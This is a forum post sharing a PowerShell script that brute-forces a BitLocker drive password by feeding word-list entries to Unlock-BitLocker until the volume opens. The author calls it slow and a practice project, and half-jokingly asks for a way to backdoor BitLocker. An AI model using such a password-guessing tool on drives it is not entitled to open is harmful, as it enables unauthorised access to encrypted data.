icarus255 Posted February 18, 2019 Posted February 18, 2019 Wrote this little password brute forcing script in Powershell while trying to decrypt a bitlocked HDD. There are some brute forcers already available that will actually test the extracted crypto values from the HDD but they are slow and cumbersome. I wanted to see if brute forcing straight through windows would be any quicker and as expected... no 😞 The code basically takes input from a text file, converts it to a "SecureString" (needed or PS has a panic attack) and then tries to decrypt the HDD. At 0.5 guesses/second, I wouldn't worry about any large word lists but it works 🙂 This was just for a bit of fun but if you know of a way to speed up the script or make it more efficient please let me know as I wrote this really to get more familiar with PS. Better yet, if you know of a way to backdoor the bitlocker encryption that would be much appreciated 😉 Quote # Need to run the script as powershell admin # Define StreamReader and point it to your passwords list $PWSstreamreader = New-Object System.IO.StreamReader("C:\temp\passwords.txt") $linenumber = 1 #feeds line by line the candidates in passwords.txt while (($readeachline =$PWSstreamreader.ReadLine()) -ne $null) {    Write-Host "$linenumber $readeachline"    # Need to convert our plaintext to SecureString for powershell to try and unlock. I guess this is some sort of security feature so people don't have plaintext passes lying around    $SecureString = ConvertTo-SecureString "$readeachline" -AsPlainText -Force    # Tries to unlock with converted SecureString.    Unlock-BitLocker -MountPoint "D:" -Password $SecureString    $info = Get-BitlockerVolume -MountPoint "D:"    $linenumber++    # Tests for decryption. Encrypted HDDs will always have a capacity of "0" so loops until capacity > 0 i.e. decrypted.    If ($info.CapacityGB -ne "0") {Break} } $PWSstreamreader.Dispose()  Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.